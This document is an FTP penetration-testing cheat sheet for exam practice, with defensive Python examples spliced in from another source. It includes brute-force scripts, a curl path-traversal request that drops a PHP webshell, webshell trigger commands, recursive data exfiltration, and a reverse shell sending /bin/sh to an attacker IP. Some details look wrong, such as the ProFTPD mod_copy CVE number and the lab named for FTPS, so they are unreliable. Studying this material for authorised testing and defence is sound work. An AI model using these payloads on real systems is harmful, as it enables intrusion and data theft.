FTP
Learning Objectives:
Understand FTP protocol basics, modes (Active/Passive), and common misconfigurations.
Perform comprehensive enumeration and brute-forcing.
Exploit legacy and modern vulns, including bounce attacks and file writes.
Automate tasks for efficiency in time-constrained exams.
Chain FTP exploits to RCE or pivoting.
Practice Tips:
Use vulnerable VMs like DVWA, Metasploitable, or VulnHub's FTP-specific boxes.
Labs: TryHackMe's "FTP" room, HackTheBox's "Resolute" (for FTPS chaining).
Common Pitfalls: Firewall blocks on the data channel (TCP/20 in Active mode, an ephemeral port in Passive); default to Passive mode; always check for FTPS (port 990).
Exam Scenario: Enumerate an open FTP, brute-force creds, upload a webshell, and escalate via misconfig.
FTP Protocol Overview
The File Transfer Protocol (FTP) is a standard for transferring files over TCP/IP networks. It supports directory/file ops (e.g., ls, cd, get/put) and operates in Active (server initiates data connection) or Passive (client initiates) modes.
Default ports: Control: TCP/21,
Data: TCP/20 (Active) or ephemeral (Passive). FTPS (FTP over SSL/TLS) uses TCP/990 (implicit) or 21 (explicit).
Attacks target: Misconfigs (anonymous access), weak auth, vulns (e.g., buffer overflows), or abuse (bounce/port scans).
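To make the Active/Passive distinction concrete, the following is an added Python example, not code from the original page. It parses the server's "227 Entering Passive Mode" reply that Passive mode depends on, builds the PORT argument an Active-mode client sends, and shows the client-side check that ignores an advertised data address which differs from the control-connection peer (the behaviour Python's ftplib adopted with its trust_server_pasv_ipv4_address flag). The reply strings and addresses are constructed for the demo.

```python
import re
from typing import Tuple

# Reply shape from RFC 959, as sent by most servers:
#   227 Entering Passive Mode (192,168,1,10,195,89)
# Six numbers: four IPv4 octets, then the port split into its high and
# low bytes, so port = p1 * 256 + p2.
PASV_RE = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def parse_pasv(reply: str) -> Tuple[str, int]:
    """Return (host, port) from a 227 reply, rejecting malformed values."""
    if not reply.startswith("227"):
        raise ValueError(f"not a 227 reply: {reply!r}")
    m = PASV_RE.search(reply)
    if m is None:
        raise ValueError(f"no h1,h2,h3,h4,p1,p2 tuple in reply: {reply!r}")
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        raise ValueError(f"byte out of range in reply: {reply!r}")
    host = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    if port == 0:
        raise ValueError("server advertised port 0")
    return host, port


def is_valid_pasv(reply: str) -> bool:
    """Convenience wrapper: True if parse_pasv accepts the reply."""
    try:
        parse_pasv(reply)
        return True
    except ValueError:
        return False


def passive_data_endpoint(reply: str, control_peer: str) -> Tuple[str, int]:
    """Endpoint a careful client actually connects to for the data channel.

    A server may advertise a host other than the control-connection peer
    (NAT, or a malicious server steering the data connection elsewhere).
    Keep the control peer's address and take only the port from the reply.
    """
    host, port = parse_pasv(reply)
    if host != control_peer:
        host = control_peer
    return host, port


def encode_port(host: str, port: int) -> str:
    """Build the argument of an Active-mode PORT command, e.g. 10,0,0,5,195,89."""
    octets = host.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError(f"not a dotted-quad IPv4 address: {host!r}")
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    return ",".join(octets + [str(port // 256), str(port % 256)])


if __name__ == "__main__":
    # Constructed sample exchange, not captured from a real server.
    print(parse_pasv("227 Entering Passive Mode (192,168,1,10,195,89)"))  # ('192.168.1.10', 50009)
    print(passive_data_endpoint("227 Entering Passive Mode (10,10,10,10,195,89)", "192.168.1.10"))
    print(encode_port("10.0.0.5", 50009))  # 10,0,0,5,195,89
```

Passive mode is the usual choice behind firewalls because the client opens the data connection outbound; the endpoint check above is what keeps a server from redirecting that connection to a third party.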
Always start with recon to map the attack surface.
0. Initial Service Discovery
# Basic service scan with version detection
sudo nmap -sC -sV -p 21 --script-args=unsafe=1 -T4 <TARGET-IP>
# Aggressive scan for maximum information
sudo nmap -A -p 21 -T4 <TARGET-IP>
# Quick banner grab with netcat
nc -nv <TARGET-IP> 21
1. Enumeration & Recon
Identify FTP services, versions, and low-hanging fruit like anonymous access.
Nmap Scanning (Enhanced)
Basic script scan + version detection + aggressive scripting for FTP-specific checks (e.g., anonymous login attempts).
sudo nmap -sC -sV --script "ftp-anon,ftp-bounce,ftp-vuln*" -p 21,20,990 <FQDN/IP>
Why improved: Adds scripts for vuln detection (e.g., CVE-1999-0017 for bounce) and includes 990 for FTPS. The script list is quoted so the shell does not expand the '*'; there is no ftp-ftps NSE script, so TLS checks on 990 use the ssl-* scripts in section 3.
Banner Grabbing (Manual)
Extract version/info from raw banner for targeted exploits.
telnet <FQDN/IP> 21   # Or: nc -v <FQDN/IP> 21; type 'QUIT' to exit
Output example: "220 ProFTPD 1.3.5 Server (Example)". Tip: Cross-reference with Exploit-DB for CVEs (e.g., search "ProFTPD 1.3.5").
Anonymous Authentication Check
Test default/public access (common in misconfigs).
ftp <FQDN/IP>
# At the login prompt:
#   Name: anonymous
#   Password: anonymous (or blank, or guest)
# Post-login:
ls -la
# Enumerate files/dirs for sensitive data (e.g., .ssh keys)
Enhanced: If successful, download everything with mget * (run prompt first to turn off per-file confirmation), or script it: lftp -u anonymous,anonymous <IP> -e "mirror; quit".
User Enumeration via Error Messages
Probe for valid users by observing login responses (some servers leak via "530 Invalid user").
# Python snippet using ftplib; -c accepts a multi-line program, which try/except needs
python3 -c "import ftplib
f = ftplib.FTP('<IP>')
try: f.login('admin', ''); print('Valid user')
except ftplib.error_perm as e: print('Refused:', e)"
Tip: Chain with wordlists /usr/share/wordlists/dirb/common.txt for usernames, comparing the 530 text returned for a nonexistent name against a likely-valid one.
2. Brute-Force Attacks
Target weak creds. Use rate-limiting evasion (e.g., delays) in exams.
Hydra (Improved Syntax) Multi-threaded, supports FTP/FTPS.
# Single user brute force
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ftp://<TARGET-IP> -t 4 -V
# User list brute force
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-P /usr/share/wordlists/rockyou.txt ftp://<TARGET-IP> -t 4
# For FTPS: hydra ... ftps://<IP>:990
Why better: Added user list (-L); -t limits threads to avoid DoS flags.
Medusa
Parallel brute-forcer.
medusa -h <TARGET-IP> -U /path/to/userlist -P /path/to/passwordlist -M ftp -F
medusa -h <FQDN/IP> -u admin -P /usr/share/wordlists/rockyou.txt -M ftp -t 10
Enhanced: -t sets concurrent login attempts per host (-T is the number of hosts tested in parallel, which changes nothing for a single target); test multiple users with -U file.
Metasploit FTP Login Modular scanner for integration with exploits.
msfconsole -q
use auxiliary/scanner/ftp/ftp_login
set RHOSTS <IP>
set USER_FILE /usr/share/wordlists/dirb/common.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 5
run
On success, note creds for later use.
Automated Python Brute-Force (New: Scripting for Exams)
Custom script for stealthy, resumable attacks.
import ftplib
import socket
import sys
import time

host = '<IP>'
userlist = [u.strip() for u in open('/usr/share/wordlists/dirb/common.txt')]
# rockyou contains non-UTF-8 bytes; skip undecodable ones instead of crashing
passlist = [p.strip() for p in open('/usr/share/wordlists/rockyou.txt', errors='ignore')]

for user in userlist:
    for passwd in passlist[:10]:  # Limit for demo; remove in practice
        try:
            ftp = ftplib.FTP(host, timeout=10)
            ftp.login(user, passwd)
            print(f'Success: {user}:{passwd}')
            ftp.quit()
            sys.exit(0)
        except ftplib.error_perm:
            pass  # 530: wrong credentials, keep going
        except (OSError, EOFError) as e:
            print(f'Connection problem: {e}', file=sys.stderr)
            time.sleep(5)  # back off if the server drops the connection
        time.sleep(1)  # pace attempts to avoid lockouts
Run: python3 ftp_brute.py. Tip: The time.sleep(1) between attempts is what keeps lockout thresholds from triggering; lengthen it if the server starts dropping connections.
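The defensive counterpart of the brute-force techniques above is spotting them in the server log. This added Python example (not from the original page) runs a sliding-window failed-login counter over vsftpd-style log lines, which vsftpd writes to /var/log/vsftpd.log by default. The log lines, IPs and usernames are constructed for the demo; the threshold and window are illustrative assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# vsftpd-style login records (CONSTRUCTED for this example, not captured from a host).
SAMPLE_LOG = [
    'Mon Mar 11 10:00:01 2024 [pid 2101] [admin] FAIL LOGIN: Client "203.0.113.7"',
    'Mon Mar 11 10:00:03 2024 [pid 2102] [admin] FAIL LOGIN: Client "203.0.113.7"',
    'Mon Mar 11 10:00:05 2024 [pid 2103] [admin] FAIL LOGIN: Client "203.0.113.7"',
    'Mon Mar 11 10:00:07 2024 [pid 2104] [admin] FAIL LOGIN: Client "203.0.113.7"',
    'Mon Mar 11 10:00:09 2024 [pid 2105] [admin] FAIL LOGIN: Client "203.0.113.7"',
    'Mon Mar 11 10:00:11 2024 [pid 2106] [admin] FAIL LOGIN: Client "203.0.113.7"',
    'Mon Mar 11 10:00:12 2024 [pid 2107] [bob] FAIL LOGIN: Client "198.51.100.2"',
    'Mon Mar 11 10:00:20 2024 [pid 2108] [admin] OK LOGIN: Client "203.0.113.7"',
    'Mon Mar 11 10:01:00 2024 [pid 2109] [bob] OK LOGIN: Client "198.51.100.2"',
]

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?(?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse_line(line: str) -> Optional[dict]:
    """Return a login event dict, or None for lines that are not login records."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"),
        "user": m["user"] or "",
        "result": m["result"],
        "ip": m["ip"],
    }


def detect_bruteforce(lines, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> List[Tuple[str, str, str]]:
    """Sliding-window failed-login counter per client IP.

    Emits (ip, 'brute-force', detail) once when an IP reaches `threshold`
    failures inside `window`, and (ip, 'success-after-bruteforce', user) when a
    flagged IP later logs in. The second alert is the one worth paging on: a
    guessed credential worked.
    """
    failures: Dict[str, deque] = defaultdict(deque)  # ip -> failure timestamps in window
    flagged = set()
    alerts: List[Tuple[str, str, str]] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = failures[ev["ip"]]
        while q and ev["ts"] - q[0] > window:  # drop failures that aged out
            q.popleft()
        if ev["result"] == "FAIL":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                alerts.append((ev["ip"], "brute-force",
                               f"{len(q)} failures within {int(window.total_seconds())}s"))
        elif ev["ip"] in flagged:
            alerts.append((ev["ip"], "success-after-bruteforce", ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The same logic ports to a SIEM rule: group FAIL LOGIN by source IP over a one-minute window, and correlate a later OK LOGIN from the same source with the earlier burst.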
3. Exploitation Techniques
Exploit vulns or abuse features for RCE/access.
FTP Bounce Attack (Port Scanning)
Uses an FTP server as a proxy to scan internal hosts.
# nmap's -b takes the relay as user:pass@host:port
nmap -Pn -n -v -p 80 -b anonymous:anonymous@<IP>:21 <target_internal_IP>
# Or manual: nc <FTP_IP> 21, log in, then PORT h1,h2,h3,h4,p1,p2 (the octets of <internal_IP> followed by the port as two bytes, 0,80 for port 80), then RETR /etc/passwd (triggers bounce)
Enhanced: Specify creds explicitly; test on closed ports for stealth.
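The misconfigurations behind the anonymous-access check in section 1 and the bounce attack above are all single lines in vsftpd.conf. This added Python example (not code from the original page) audits a vsftpd configuration against the settings that matter, with a constructed weak file beside a constructed hardened one. The defaults table follows the upstream vsftpd.conf(5) man page; distribution packages may ship different defaults, which is an assumption to verify on the host.

```python
from typing import Dict, List, Tuple

# Constructed vsftpd.conf fragments for the demo (not taken from any real host).
WEAK_CONF = """\
# anyone can log in and write, and data connections may go anywhere
anonymous_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
write_enable=YES
chroot_local_user=NO
port_promiscuous=YES
pasv_promiscuous=YES
ssl_enable=NO
"""

HARDENED_CONF = """\
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
allow_writeable_chroot=NO
port_promiscuous=NO
pasv_promiscuous=NO
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""

# key -> (expected value, why it matters)
CHECKS: Dict[str, Tuple[str, str]] = {
    "anonymous_enable": ("NO", "anonymous login accepted"),
    "anon_upload_enable": ("NO", "anonymous users may upload files"),
    "anon_mkdir_write_enable": ("NO", "anonymous users may create directories"),
    "chroot_local_user": ("YES", "local users are not confined to their home; '..' reaches the rest of the filesystem"),
    "port_promiscuous": ("NO", "PORT to a third-party address is accepted (FTP bounce)"),
    "pasv_promiscuous": ("NO", "data connection accepted from any source address"),
    "ssl_enable": ("YES", "credentials and data cross the network in cleartext"),
}

# Upstream defaults (assumption: your distro's packaged config may differ).
UPSTREAM_DEFAULTS: Dict[str, str] = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "chroot_local_user": "NO",
    "port_promiscuous": "NO",
    "pasv_promiscuous": "NO",
    "ssl_enable": "NO",
}

_BOOL_ALIASES = {"TRUE": "YES", "1": "YES", "FALSE": "NO", "0": "NO"}


def parse_vsftpd_conf(text: str) -> Dict[str, str]:
    """key=value lines; '#' comments and blanks ignored; booleans normalised to YES/NO."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip().upper()
        settings[key.strip().lower()] = _BOOL_ALIASES.get(value, value)
    return settings


def audit(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (key, actual, expected, reason) for every check that fails."""
    settings = parse_vsftpd_conf(text)
    findings = []
    for key, (expected, reason) in CHECKS.items():
        actual = settings.get(key, UPSTREAM_DEFAULTS[key])
        if actual != expected:
            findings.append((key, actual, expected, reason))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit(conf)
        print(f"[{name}] {len(findings)} finding(s)")
        for key, actual, expected, reason in findings:
            print(f"  {key}={actual} (expected {expected}): {reason}")
```

An empty file still produces findings, because the upstream default enables anonymous login and leaves users un-chrooted; that is why the audit consults the defaults table rather than only the keys present.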
CoreFTP Arbitrary File Write (Path Traversal)
Exploits weak path handling for out-of-dir writes (CVE-2012-4921 variant).
curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<pass> --data-binary "<?php system(\$_GET['cmd']); ?>" --path-as-is "https://<IP>:990/../../../../../../../var/www/html/shell.php"
Why improved: Added PHP webshell payload; -k (same as --insecure) skips certificate checks for FTPS; --path-as-is stops curl from collapsing the ../ segments before the request is sent. Verify: curl "http://<IP>/shell.php?cmd=id".
ProFTPD Mod_Copy RCE (New: Common Vuln Exploit)
CVE-2021-46875: Remote command execution via copy.
# Manual (post-auth)
SITE CPFR /etc/passwd
SITE CPTO /var/www/html/pwned.txt   # Copies file; chain to webshell upload
Metasploit: use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS <IP>; exploit. Exam tip: Check Nmap for ProFTPD versions <1.3.5.
Directory Traversal & Webshell Upload (Post-Auth Abuse)
After login, escape root and upload payloads.
# Via FTP client
cd ../../../../../../var/www/html   # Traverse up/down
put shell.php                        # Local file: <?php system($_GET['c']); ?>
Automated: lftp -u user,pass <IP> -e "cd ../../../../var/www/html; put shell.php; quit". Trigger: curl "http://<IP>/shell.php?c=whoami". Pitfall: Ensure the web server runs on the same host.
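Both the CoreFTP traversal and the post-auth cd ../../ abuse above come down to a server accepting a client path without confining it. This added Python example (not from the original page or from any FTP server's source) shows the naive join beside a confining resolver: the path is percent-decoded when an HTTP front-end is involved, canonicalised with realpath so '..' and symlinks are resolved, and then checked against the root with commonpath (a plain startswith check would let /srv/ftpx pass for root /srv/ftp). The root directory and paths are constructed for the demo and need not exist on disk.

```python
import os
from urllib.parse import unquote


def unsafe_resolve(root: str, client_path: str) -> str:
    """The bug: trusting the client-supplied path after a naive join."""
    return os.path.join(root, client_path.lstrip("/"))


def safe_resolve(root: str, client_path: str, percent_decode: bool = False) -> str:
    """Confine client_path to root; raise PermissionError if it escapes.

    Decode first when the path arrived over HTTP (so %2e%2e becomes '..'),
    canonicalise with realpath, and only then compare against the root.
    Checking before decoding is the mistake --path-as-is style requests exploit.
    """
    if percent_decode:
        client_path = unquote(client_path)
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, client_path.lstrip("/")))
    # commonpath works per path component, so /srv/ftpx does not pass for root /srv/ftp
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PermissionError(f"path escapes the FTP root: {client_path!r}")
    return candidate


def is_confined(root: str, client_path: str, percent_decode: bool = False) -> bool:
    """True if safe_resolve accepts the path, False if it rejects it."""
    try:
        safe_resolve(root, client_path, percent_decode)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    # Constructed root and request paths; nothing here touches the real filesystem.
    root = "/srv/ftp"
    for path in ("uploads/a.txt",
                 "../../../../../../var/www/html/shell.php",
                 "%2e%2e/%2e%2e/etc/passwd"):
        print(f"{path!r:50} naive={unsafe_resolve(root, path)}")
        print(f"{'':50} confined={is_confined(root, path, percent_decode=True)}")
```

Note the last sample: without decoding, "%2e%2e" is just an oddly named directory inside the root and the check passes, which is exactly the gap an encoded traversal relies on.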
FTPS-Specific Attacks (SSL/TLS Weaknesses)
If FTPS is detected, target weak ciphers or cert issues.
# Test SSL with nmap
nmap --script ssl-cert,ssl-enum-ciphers -p 990 <IP>
# Cipher/protocol audit with sslscan or testssl.sh
testssl.sh <IP>:990
# For explicit FTPS (AUTH TLS on 21): testssl.sh -t ftp <IP>:21
Exploit: Use openssl s_client -connect <IP>:990 -cipher LOW to force weak ciphers for MiTM.
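The weak-cipher downgrade above only works when one side is willing to negotiate it. This added Python example (not code from the original page) builds the client-side TLS context a hardened FTPS client uses: certificate and hostname verification on, TLS 1.2 as the floor, and the legacy suites excluded, then uses it with ftplib's FTP_TLS for explicit FTPS on port 21. The context_summary helper and connect_explicit_ftps are names chosen here; ftplib has no built-in implicit-FTPS (port 990) client, which is noted in the code.

```python
import ssl
from ftplib import FTP_TLS
from typing import List

# OpenSSL cipher string: forward-secret AEAD suites only, legacy algorithms excluded.
STRONG_CIPHERS = "ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!eNULL:!MD5:!RC4:!3DES"


def hardened_tls_context() -> ssl.SSLContext:
    """Client context that refuses what a cipher-downgrade attempt would offer."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED and hostname checks on
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers(STRONG_CIPHERS)     # applies to the TLS 1.2 suite list
    return ctx


def negotiable_ciphers(ctx: ssl.SSLContext) -> List[str]:
    """Names of the suites this context will offer."""
    return [c["name"] for c in ctx.get_ciphers()]


def weak_ciphers_offered(ctx: ssl.SSLContext) -> List[str]:
    """Any offered suite that still uses a legacy primitive."""
    bad = ("RC4", "DES", "NULL", "MD5", "EXP")
    return [n for n in negotiable_ciphers(ctx) if any(b in n for b in bad)]


def context_summary(ctx: ssl.SSLContext) -> dict:
    """Plain-data view of the settings an auditor would want to confirm."""
    return {
        "verify_required": ctx.verify_mode == ssl.CERT_REQUIRED,
        "check_hostname": ctx.check_hostname,
        "min_version": ctx.minimum_version.name,
        "weak_ciphers": weak_ciphers_offered(ctx),
    }


def connect_explicit_ftps(host: str, user: str, password: str,
                          port: int = 21, timeout: float = 15) -> FTP_TLS:
    """Explicit FTPS: plain connect, AUTH TLS, then PROT P for the data channel.

    Implicit FTPS on 990 wraps the socket before the banner; ftplib does not
    ship that variant, so it would need a small FTP_TLS subclass.
    """
    ftps = FTP_TLS(context=hardened_tls_context(), timeout=timeout)
    ftps.connect(host, port)
    ftps.auth()               # upgrade the control channel
    ftps.login(user, password)
    ftps.prot_p()             # encrypt the data channel as well
    return ftps


if __name__ == "__main__":
    print(context_summary(hardened_tls_context()))
```

Against this context, an openssl s_client -cipher LOW style downgrade fails at the handshake because no common suite exists; the same minimum-version and cipher-list settings belong in the server configuration (vsftpd's ssl_tlsv1_2 and ssl_ciphers, ProFTPD's TLSProtocol and TLSCipherSuite).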
4. Post-Exploitation & Pivoting
Use the foothold to reach data, credentials, or other hosts.
FTP Client Commands (Manual File System Interaction)
Core ops + advanced for data exfil/escalation.
# Essential commands:
status                          # Connection status
pwd                             # Print working directory
ls -la                          # List with details (perms, owners)
cd <dir>                        # Navigate
get <file>                      # Download (e.g., get config.ini)
mget *.txt *.conf               # Multi-download patterns
put <local>                     # Upload (e.g., put /tmp/backdoor)
mput *.php                      # Multi-upload
mkdir <dir> / rmdir <dir>       # Create/delete dirs
rename <old> <new>              # Rename for evasion
quote "SITE CHMOD 777 <file>"   # Change perms (if supported)
help / ?                        # Command help
quit                            # Exit
Use Passive mode (passive) if Active fails.
Automated Data Exfiltration
# Recursive download with wget
wget -m --ftp-user=<username> --ftp-password=<password> ftp://<TARGET-IP>/
# Recursive mirror with lftp
lftp -u <username>,<password> -p 21 <TARGET-IP>
mirror / /local/path/
Pivoting via FTP (Network Abuse): Upload nc/SSH keys for reverse shells.
# Upload and exec (if writable /tmp)
put nc.exe   # Then: nc -e /bin/sh <attacker_IP> 4444
Chain: Use for internal scans: nmap -sT -p 445 <internal_range> --source-port 21 (spoof via bounce).
Training Drills & Review
Hands-On Lab: Set up Metasploitable2; run full workflow (enumerate → brute → exploit → shell).
Scenario Quiz: "FTP on 21 is anon-enabled, but FTPS on 990 has weak creds—how to chain?" (Ans: Brute FTPS, upload to web root).
Time It: Aim for <10 min full attack in exam sims.
Resources: OWASP FTP Cheat Sheet, SANS SEC560 notes, Exploit-DB searches.